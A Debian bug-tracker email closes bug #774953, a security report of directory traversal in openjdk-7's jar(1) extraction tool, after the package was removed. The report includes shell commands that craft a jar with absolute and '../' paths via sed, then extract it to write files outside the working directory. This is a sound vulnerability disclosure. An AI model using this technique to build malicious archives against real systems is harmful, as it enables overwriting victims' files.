Bug#774953: marked as done (jar(1): directory traversal)

Fri, 15 Apr 2016 12:41:41 -0700 

Your message dated Fri, 15 Apr 2016 19:38:07 +0000
with message-id <[email protected]>
and subject line Bug#820703: Removed package(s) from unstable
has caused the Debian Bug report #774953,
regarding jar(1): directory traversal
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
774953: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774953
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: openjdk-7-jdk
Version: 7u71-2.5.3-2
Tags: security
jar(1) is susceptible to a directory traversal vulnerability. While extracting an archive, it will happily use absolute and relative paths taken from the archive. This can be exploited by a malicious archive to write files outside the current directory. 

For example, let's create a sample archive:

$ mkdir Xtmp/ XX/
$ touch Xtmp/abs XX/rel
$ jar -cMvf test.jar Xtmp/abs XX/rel
$ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar
$ rm -r Xtmp/ XX/

and then test it:

$ ls /tmp/abs ../rel
ls: cannot access /tmp/abs: No such file or directory
ls: cannot access ../rel: No such file or directory

$ jar -xvf test.jar
extracted: /tmp/abs
extracted: ../rel

$ ls /tmp/abs ../rel
../rel  /tmp/abs
My `jar` points to /etc/alternatives/jar, which points to /usr/lib/jvm/java-7-openjdk-amd64/bin/jar .
Not sure if this is just CVE-2005-1080 not fixed or something else. But please note that CVE-2005-1080 talks about .. only. 

--
Alexander Cherepanov

--- End Message ---
--- Begin Message --- 
Version: 7u95-2.6.4-1+rm

Dear submitter,

as the package openjdk-7 has just been removed from the Debian archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/820703

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
[email protected].

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)

--- End Message ---

Reply via email to